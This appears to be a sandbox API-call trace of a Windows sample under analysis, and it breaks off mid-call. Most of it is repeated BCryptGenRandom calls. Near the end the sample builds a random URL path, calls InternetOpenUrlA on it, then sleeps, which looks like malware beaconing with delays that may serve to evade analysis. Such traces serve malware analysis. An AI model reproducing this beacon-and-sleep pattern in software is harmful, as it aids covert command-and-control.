[0247.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e6a, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d5e6a) returned 0x0 [0247.161] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0247.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.162] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.163] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e9a, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x4d5e9a) returned 0x0 [0247.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.306] GetProcessHeap () returned 0x440000 [0247.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0247.306] lstrcpyA (in: lpString1=0x472f30, lpString2=" ^M" | out: lpString1=" ^M") returned=" ^M" [0247.306] lstrcatA (in: lpString1=" ^M", lpString2="/5h68oNcgjHbRhruNawui3cazkxbsy8phE06hwrnhDigeu2q/e1c8yhx8r4uxt7i2geqqaqfr/aqKZ8wi3Wio3EejqFeoV0feq5t6iQrygfp2txznu9bDyr2z/3rkd5iUox6nEufOet6h/" | out: lpString1=" ^M/5h68oNcgjHbRhruNawui3cazkxbsy8phE06hwrnhDigeu2q/e1c8yhx8r4uxt7i2geqqaqfr/aqKZ8wi3Wio3EejqFeoV0feq5t6iQrygfp2txznu9bDyr2z/3rkd5iUox6nEufOet6h/") returned=" ^M/5h68oNcgjHbRhruNawui3cazkxbsy8phE06hwrnhDigeu2q/e1c8yhx8r4uxt7i2geqqaqfr/aqKZ8wi3Wio3EejqFeoV0feq5t6iQrygfp2txznu9bDyr2z/3rkd5iUox6nEufOet6h/" [0247.306] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.306] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=" ^M/5h68oNcgjHbRhruNawui3cazkxbsy8phE06hwrnhDigeu2q/e1c8yhx8r4uxt7i2geqqaqfr/aqKZ8wi3Wio3EejqFeoV0feq5t6iQrygfp2txznu9bDyr2z/3rkd5iUox6nEufOet6h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.307] GetProcessHeap () returned 0x440000 [0247.307] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0247.307] GetProcessHeap () returned 0x440000 [0247.307] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0247.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.307] Sleep (dwMilliseconds=0x1b19a) [0247.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.435] GetProcessHeap () returned 0x440000 [0247.435] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b3a0 [0247.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3a1, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a1b3a1) returned 0x0 [0247.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3b9, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b3b9) returned 0x0 [0247.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.442] GetProcAddress 